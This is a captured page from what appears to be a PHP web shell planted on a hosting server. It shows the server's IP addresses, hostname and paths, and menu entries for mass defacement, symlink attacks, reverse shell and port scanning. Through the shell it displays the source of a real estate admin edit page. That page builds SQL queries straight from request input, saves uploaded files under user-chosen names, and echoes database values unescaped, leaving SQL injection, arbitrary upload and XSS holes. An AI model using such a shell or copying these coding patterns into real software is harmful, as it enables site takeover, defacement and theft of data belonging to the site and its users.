Tul xxx Tul
User / IP
:
216.73.216.227
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
inmobiliaria
/
admin
/
Viewing: propertyedit.php
<?php session_start(); require("config.php"); ////code if(!isset($_SESSION['auser'])) { header("location:index.php"); } //// code insert //// add code $error=""; $msg=""; if(isset($_POST['add'])) { $pid=$_REQUEST['id']; $existing = mysqli_query($con, "SELECT uid,pimage,pimage1,pimage2,pimage3,pimage4,mapimage,topmapimage,groundmapimage,status,isFeatured FROM property WHERE pid={$pid} LIMIT 1"); $ex = $existing ? mysqli_fetch_assoc($existing) : null; $title=$_POST['title']; $content=$_POST['content']; $ptype=$_POST['ptype']; $bhk=$_POST['bhk']; $bed=$_POST['bed']; $balc=$_POST['balc']; $hall=$_POST['hall']; $stype=$_POST['stype']; $bath=$_POST['bath']; $kitc=$_POST['kitc']; $floor=$_POST['floor']; $price=$_POST['price']; $city=$_POST['city']; $asize=$_POST['asize']; $loc=$_POST['loc']; $state=$_POST['state']; $status = isset($_POST['status']) ? $_POST['status'] : ''; if($status === '') { $status = $ex && isset($ex['status']) ? $ex['status'] : 'available'; } if(isset($_POST['uid'])) { $uid = trim($_POST['uid']); if($uid === '') { $uid = 0; } } else { $uid = $ex && isset($ex['uid']) ? $ex['uid'] : 0; } $uid = (int)$uid; $feature=$_POST['feature']; $totalfloor=$_POST['totalfl']; $isFeatured = isset($_POST['isFeatured']) ? $_POST['isFeatured'] : ''; if($isFeatured === '') { $isFeatured = ($ex && isset($ex['isFeatured']) && $ex['isFeatured'] !== null && $ex['isFeatured'] !== '') ? $ex['isFeatured'] : 0; } $aimage=$_FILES['aimage']['name']; $aimage1=$_FILES['aimage1']['name']; $aimage2=$_FILES['aimage2']['name']; $aimage3=$_FILES['aimage3']['name']; $aimage4=$_FILES['aimage4']['name']; $fimage=$_FILES['fimage']['name']; $fimage1=$_FILES['fimage1']['name']; $fimage2=$_FILES['fimage2']['name']; $temp_name =$_FILES['aimage']['tmp_name']; $temp_name1 =$_FILES['aimage1']['tmp_name']; $temp_name2 =$_FILES['aimage2']['tmp_name']; $temp_name3 =$_FILES['aimage3']['tmp_name']; $temp_name4 =$_FILES['aimage4']['tmp_name']; $temp_name5 =$_FILES['fimage']['tmp_name']; $temp_name6 =$_FILES['fimage1']['tmp_name']; $temp_name7 =$_FILES['fimage2']['tmp_name']; $pimage = ($aimage !== '') ? $aimage : (($ex && isset($ex['pimage'])) ? $ex['pimage'] : ''); $pimage1 = ($aimage1 !== '') ? $aimage1 : (($ex && isset($ex['pimage1'])) ? $ex['pimage1'] : ''); $pimage2 = ($aimage2 !== '') ? $aimage2 : (($ex && isset($ex['pimage2'])) ? $ex['pimage2'] : ''); $pimage3 = ($aimage3 !== '') ? $aimage3 : (($ex && isset($ex['pimage3'])) ? $ex['pimage3'] : ''); $pimage4 = ($aimage4 !== '') ? $aimage4 : (($ex && isset($ex['pimage4'])) ? $ex['pimage4'] : ''); $mapimage = ($fimage !== '') ? $fimage : (($ex && isset($ex['mapimage'])) ? $ex['mapimage'] : ''); $topmapimage = ($fimage1 !== '') ? $fimage1 : (($ex && isset($ex['topmapimage'])) ? $ex['topmapimage'] : ''); $groundmapimage = ($fimage2 !== '') ? $fimage2 : (($ex && isset($ex['groundmapimage'])) ? $ex['groundmapimage'] : ''); if($aimage !== '') move_uploaded_file($temp_name,"property/$aimage"); if($aimage1 !== '') move_uploaded_file($temp_name1,"property/$aimage1"); if($aimage2 !== '') move_uploaded_file($temp_name2,"property/$aimage2"); if($aimage3 !== '') move_uploaded_file($temp_name3,"property/$aimage3"); if($aimage4 !== '') move_uploaded_file($temp_name4,"property/$aimage4"); if($fimage !== '') move_uploaded_file($temp_name5,"property/$fimage"); if($fimage1 !== '') move_uploaded_file($temp_name6,"property/$fimage1"); if($fimage2 !== '') move_uploaded_file($temp_name7,"property/$fimage2"); $sql = "UPDATE property SET title= '{$title}', pcontent= '{$content}', type='{$ptype}', bhk='{$bhk}', stype='{$stype}', bedroom='{$bed}', bathroom='{$bath}', balcony='{$balc}', kitchen='{$kitc}', hall='{$hall}', floor='{$floor}', size='{$asize}', price='{$price}', location='{$loc}', city='{$city}', state='{$state}', feature='{$feature}', pimage='{$pimage}', pimage1='{$pimage1}', pimage2='{$pimage2}', pimage3='{$pimage3}', pimage4='{$pimage4}', uid='{$uid}', status='{$status}', mapimage='{$mapimage}', topmapimage='{$topmapimage}', groundmapimage='{$groundmapimage}', totalfloor='{$totalfloor}', isFeatured='{$isFeatured}' WHERE pid = {$pid}"; $result=mysqli_query($con,$sql); if($result == true) { $msg="<p class='alert alert-success'>Propiedad Actualizada</p>"; header("Location:propertyview.php?msg=$msg"); } else{ $msg="<p class='alert alert-warning'>Propiedad No Actualizada</p>"; header("Location:propertyview.php?msg=$msg"); } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0"> <title>LM HOMES | Property</title> <!-- Favicon --> <link rel="shortcut icon" type="image/png" href="../images/logo/logo.png"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <!-- Fontawesome CSS --> <link rel="stylesheet" href="assets/css/font-awesome.min.css"> <!-- Feathericon CSS --> <link rel="stylesheet" href="assets/css/feathericon.min.css"> <!-- Main CSS --> <link rel="stylesheet" href="assets/css/style.css"> <!-- Modern Admin 2026 CSS --> <link rel="stylesheet" href="assets/css/modern-admin-2026.css"> <!--[if lt IE 9]> <script src="assets/js/html5shiv.min.js"></script> <script src="assets/js/respond.min.js"></script> <![endif]--> </head> <body> <!-- Header --> <?php include("header.php"); ?> <!-- /Sidebar --> <!-- Page Wrapper --> <div class="page-wrapper"> <div class="content container-fluid"> <!-- Page Header --> <div class="page-header"> <div class="row"> <div class="col"> <h3 class="page-title">Propiedad</h3> <ul class="breadcrumb"> <li class="breadcrumb-item"><a href="dashboard.php">Panel de Control</a></li> <li class="breadcrumb-item active">Propiedad</li> </ul> </div> </div> </div> <!-- /Page Header --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h4 class="card-title">Actualizar Detalles de Propiedad</h4> <?php echo $error; ?> <?php echo $msg; ?> </div> <form method="post" enctype="multipart/form-data"> <?php $pid=$_REQUEST['id']; $query=mysqli_query($con,"select * from property where pid='$pid'"); while($row=mysqli_fetch_row($query)) { ?> <div class="card-body"> <h5 class="card-title">Detalle de Propiedad</h5> <div class="row"> <div class="col-xl-12"> <div class="form-group row"> <label class="col-lg-2 col-form-label">Título</label> <div class="col-lg-9"> <input type="text" class="form-control" name="title" required value="<?php echo $row['1']; ?>"> </div> </div> <div class="form-group row"> <label class="col-lg-2 col-form-label">Contenido</label> <div class="col-lg-9"> <textarea class="tinymce form-control" name="content" rows="10" cols="30"><?php echo $row['2']; ?></textarea> </div> </div> <div class="form-group row"> <label class="col-lg-2 col-form-label">Agente / Usuario</label> <div class="col-lg-9"> <select class="form-control" name="uid"> <option value="" <?php echo (empty($row['23']) || $row['23'] == 0) ? 'selected' : ''; ?>>Sin asignación</option> <?php $users = mysqli_query($con, "SELECT uid, uname, uemail, utype FROM user WHERE utype IN ('agent','user') ORDER BY uname ASC"); while($u = mysqli_fetch_assoc($users)) { ?> <option value="<?php echo (int)$u['uid']; ?>" <?php echo ((int)$u['uid'] === (int)$row['23']) ? 'selected' : ''; ?>><?php echo htmlspecialchars($u['uname'], ENT_QUOTES) . ' (' . htmlspecialchars($u['utype'], ENT_QUOTES) . ') - ' . htmlspecialchars($u['uemail'], ENT_QUOTES); ?></option> <?php } ?> </select> </div> </div> </div> <div class="col-xl-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label">Tipo de Propiedad</label> <div class="col-lg-9"> <select class="form-control" required name="ptype"> <option value="">Seleccionar Tipo</option> <option value="apartment" <?php echo ($row['3'] == 'apartment') ? 'selected' : ''; ?>>Apartamento</option> <option value="flat" <?php echo ($row['3'] == 'flat') ? 'selected' : ''; ?>>Piso</option> <option value="building" <?php echo ($row['3'] == 'building') ? 'selected' : ''; ?>>Edificio</option> <option value="house" <?php echo ($row['3'] == 'house') ? 'selected' : ''; ?>>Casa</option> <option value="villa" <?php echo ($row['3'] == 'villa') ? 'selected' : ''; ?>>Villa</option> <option value="office" <?php echo ($row['3'] == 'office') ? 'selected' : ''; ?>>Oficina</option> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Tipo de Venta</label> <div class="col-lg-9"> <select class="form-control" required name="stype"> <option value="">Seleccionar Estado</option> <option value="rent" <?php echo ($row['5'] == 'rent') ? 'selected' : ''; ?>>Alquiler</option> <option value="sale" <?php echo ($row['5'] == 'sale') ? 'selected' : ''; ?>>Venta</option> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Baño</label> <div class="col-lg-9"> <input type="text" class="form-control" name="bath" required value="<?php echo $row['7']; ?>"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Cocina</label> <div class="col-lg-9"> <input type="text" class="form-control" name="kitc" required value="<?php echo $row['9']; ?>"> </div> </div> </div> <div class="col-xl-6"> <div class="form-group row mb-3"> <label class="col-lg-3 col-form-label">BHK</label> <div class="col-lg-9"> <select class="form-control" required name="bhk"> <option value="">Seleccionar BHK</option> <option value="1 BHK" <?php echo ($row['4'] == '1 BHK') ? 'selected' : ''; ?>>1 BHK</option> <option value="2 BHK" <?php echo ($row['4'] == '2 BHK') ? 'selected' : ''; ?>>2 BHK</option> <option value="3 BHK" <?php echo ($row['4'] == '3 BHK') ? 'selected' : ''; ?>>3 BHK</option> <option value="4 BHK" <?php echo ($row['4'] == '4 BHK') ? 'selected' : ''; ?>>4 BHK</option> <option value="5 BHK" <?php echo ($row['4'] == '5 BHK') ? 'selected' : ''; ?>>5 BHK</option> <option value="1,2 BHK" <?php echo ($row['4'] == '1,2 BHK') ? 'selected' : ''; ?>>1,2 BHK</option> <option value="2,3 BHK" <?php echo ($row['4'] == '2,3 BHK') ? 'selected' : ''; ?>>2,3 BHK</option> <option value="2,3,4 BHK" <?php echo ($row['4'] == '2,3,4 BHK') ? 'selected' : ''; ?>>2,3,4 BHK</option> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Habitación</label> <div class="col-lg-9"> <input type="text" class="form-control" name="bed" required value="<?php echo $row['6']; ?>"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Balcón</label> <div class="col-lg-9"> <input type="text" class="form-control" name="balc" required value="<?php echo $row['8']; ?>"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Sala</label> <div class="col-lg-9"> <input type="text" class="form-control" name="hall" required value="<?php echo $row['10']; ?>"> </div> </div> </div> </div> <h4 class="card-title">Precio y Ubicación</h4> <div class="row"> <div class="col-xl-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label">Piso</label> <div class="col-lg-9"> <select class="form-control" required name="floor"> <option value="">Seleccionar Piso</option> <option value="1st Floor" <?php echo ($row['11'] == '1st Floor') ? 'selected' : ''; ?>>Piso 1</option> <option value="2nd Floor" <?php echo ($row['11'] == '2nd Floor') ? 'selected' : ''; ?>>Piso 2</option> <option value="3rd Floor" <?php echo ($row['11'] == '3rd Floor') ? 'selected' : ''; ?>>Piso 3</option> <option value="4th Floor" <?php echo ($row['11'] == '4th Floor') ? 'selected' : ''; ?>>Piso 4</option> <option value="5th Floor" <?php echo ($row['11'] == '5th Floor') ? 'selected' : ''; ?>>Piso 5</option> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Precio</label> <div class="col-lg-9"> <input type="text" class="form-control" name="price" required value="<?php echo $row['13']; ?>"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Departamento</label> <div class="col-lg-9"> <select class="form-control" required name="state" id="stateSelect"> <option value="">Seleccionar Departamento</option> <?php $states = mysqli_query($con, "SELECT * FROM state"); while($s = mysqli_fetch_assoc($states)) { ?> <option value="<?php echo $s['sname']; ?>" data-sid="<?php echo $s['sid']; ?>" <?php echo ($s['sname'] == $row['16']) ? 'selected' : ''; ?>><?php echo $s['sname']; ?></option> <?php } ?> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Ciudad</label> <div class="col-lg-9"> <select class="form-control" required name="city" id="citySelect"> <option value="">Seleccionar Ciudad</option> <?php $cities = mysqli_query($con, "SELECT * FROM city"); while($c = mysqli_fetch_assoc($cities)) { ?> <option value="<?php echo $c['cname']; ?>" data-sid="<?php echo $c['sid']; ?>" <?php echo ($c['cname'] == $row['15']) ? 'selected' : ''; ?>><?php echo $c['cname']; ?></option> <?php } ?> </select> </div> </div> </div> <div class="col-xl-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label">Total de Pisos</label> <div class="col-lg-9"> <select class="form-control" required name="totalfl"> <option value="">Seleccionar Piso</option> <option value="1 Floor" <?php echo ($row['28'] == '1 Floor') ? 'selected' : ''; ?>>1 Piso</option> <option value="2 Floor" <?php echo ($row['28'] == '2 Floor') ? 'selected' : ''; ?>>2 Pisos</option> <option value="3 Floor" <?php echo ($row['28'] == '3 Floor') ? 'selected' : ''; ?>>3 Pisos</option> <option value="4 Floor" <?php echo ($row['28'] == '4 Floor') ? 'selected' : ''; ?>>4 Pisos</option> <option value="5 Floor" <?php echo ($row['28'] == '5 Floor') ? 'selected' : ''; ?>>5 Pisos</option> <option value="6 Floor" <?php echo ($row['28'] == '6 Floor') ? 'selected' : ''; ?>>6 Pisos</option> <option value="7 Floor" <?php echo ($row['28'] == '7 Floor') ? 'selected' : ''; ?>>7 Pisos</option> <option value="8 Floor" <?php echo ($row['28'] == '8 Floor') ? 'selected' : ''; ?>>8 Pisos</option> <option value="9 Floor" <?php echo ($row['28'] == '9 Floor') ? 'selected' : ''; ?>>9 Pisos</option> <option value="10 Floor" <?php echo ($row['28'] == '10 Floor') ? 'selected' : ''; ?>>10 Pisos</option> <option value="11 Floor" <?php echo ($row['28'] == '11 Floor') ? 'selected' : ''; ?>>11 Pisos</option> <option value="12 Floor" <?php echo ($row['28'] == '12 Floor') ? 'selected' : ''; ?>>12 Pisos</option> <option value="13 Floor" <?php echo ($row['28'] == '13 Floor') ? 'selected' : ''; ?>>13 Pisos</option> <option value="14 Floor" <?php echo ($row['28'] == '14 Floor') ? 'selected' : ''; ?>>14 Pisos</option> <option value="15 Floor" <?php echo ($row['28'] == '15 Floor') ? 'selected' : ''; ?>>15 Pisos</option> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Tamaño del Área</label> <div class="col-lg-9"> <input type="text" class="form-control" name="asize" required value="<?php echo $row['12']; ?>"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Dirección</label> <div class="col-lg-9"> <input type="text" class="form-control" name="loc" required value="<?php echo $row['14']; ?>"> </div> </div> </div> </div> <div class="form-group row"> <label class="col-lg-2 col-form-label">Características</label> <div class="col-lg-9"> <p class="alert alert-danger">* Importante: Por favor NO elimine el contenido a continuación, solo cambie <b>Sí</b> o <b>No</b> o los detalles y NO agregue más detalles</p> <textarea class="tinymce form-control" name="feature" rows="10" cols="30"> <?php echo $row['17']; ?> </textarea> </div> </div> <h4 class="card-title">Imagen y Estado</h4> <div class="row"> <div class="col-xl-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen</label> <div class="col-lg-9"> <input class="form-control" name="aimage" type="file"> <img src="property/<?php echo $row['18'];?>" alt="pimage" height="150" width="180"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen 2</label> <div class="col-lg-9"> <input class="form-control" name="aimage2" type="file"> <img src="property/<?php echo $row['20'];?>" alt="pimage" height="150" width="180"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen 4</label> <div class="col-lg-9"> <input class="form-control" name="aimage4" type="file"> <img src="property/<?php echo $row['22'];?>" alt="pimage" height="150" width="180"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Estado</label> <div class="col-lg-9"> <select class="form-control" name="status"> <option value="">Seleccionar Estado</option> <option value="available" <?php echo ($row['24'] == 'available') ? 'selected' : ''; ?>>Disponible</option> <option value="sold out" <?php echo ($row['24'] == 'sold out') ? 'selected' : ''; ?>>Vendido</option> </select> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen Plano Sótano</label> <div class="col-lg-9"> <input class="form-control" name="fimage1" type="file"> <img src="property/<?php echo $row['26'];?>" alt="pimage" height="150" width="180"> </div> </div> </div> <div class="col-xl-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen 1</label> <div class="col-lg-9"> <input class="form-control" name="aimage1" type="file"> <img src="property/<?php echo $row['19'];?>" alt="pimage" height="150" width="180"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen 3</label> <div class="col-lg-9"> <input class="form-control" name="aimage3" type="file"> <img src="property/<?php echo $row['21'];?>" alt="pimage" height="150" width="180"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen Plano de Piso</label> <div class="col-lg-9"> <input class="form-control" name="fimage" type="file"> <img src="property/<?php echo $row['25'];?>" alt="pimage" height="150" width="180"> </div> </div> <div class="form-group row"> <label class="col-lg-3 col-form-label">Imagen Plano Planta Baja</label> <div class="col-lg-9"> <input class="form-control" name="fimage2" type="file"> <img src="property/<?php echo $row['27'];?>" alt="pimage" height="150" width="180"> </div> </div> </div> </div> <hr> <div class="row"> <div class="col-md-6"> <div class="form-group row"> <label class="col-lg-3 col-form-label"><b>¿Es Destacada?</b></label> <div class="col-lg-9"> <select class="form-control" name="isFeatured"> <option value="">Seleccionar...</option> <option value="0" <?php echo ($row['30'] == 0) ? 'selected' : ''; ?>>No</option> <option value="1" <?php echo ($row['30'] == 1) ? 'selected' : ''; ?>>Sí</option> </select> </div> </div> </div> </div> <input type="submit" value="Enviar" class="btn btn-primary"name="add" style="margin-left:200px;"> </div> </form> <?php } ?> </div> </div> </div> </div> </div> <!-- /Main Wrapper --> <!-- jQuery --> <script src="assets/js/jquery-3.2.1.min.js"></script> <script src="assets/plugins/tinymce/tinymce.min.js"></script> <script src="assets/plugins/tinymce/init-tinymce.min.js"></script> <!-- Bootstrap Core JS --> <script src="assets/js/popper.min.js"></script> <script src="assets/js/bootstrap.min.js"></script> <!-- Slimscroll JS --> <script src="assets/plugins/slimscroll/jquery.slimscroll.min.js"></script> <!-- Custom JS --> <script src="assets/js/script.js"></script> <script> (function () { function filterCities() { var stateSel = document.getElementById('stateSelect'); var citySel = document.getElementById('citySelect'); if (!stateSel || !citySel) return; var stateOpt = stateSel.options[stateSel.selectedIndex]; var sid = stateOpt ? stateOpt.getAttribute('data-sid') : ''; var selectedStillVisible = false; for (var i = 0; i < citySel.options.length; i++) { var opt = citySel.options[i]; if (i === 0) { opt.hidden = false; continue; } var optSid = opt.getAttribute('data-sid'); var show = !!sid && optSid === sid; opt.hidden = !show; if (show && opt.selected) selectedStillVisible = true; } if (citySel.value && !selectedStillVisible) { citySel.value = ''; } } document.addEventListener('DOMContentLoaded', function () { var stateSel = document.getElementById('stateSelect'); if (stateSel) stateSel.addEventListener('change', filterCities); filterCities(); }); })(); </script> </body> </html>
Coded With 💗 by
0x6ick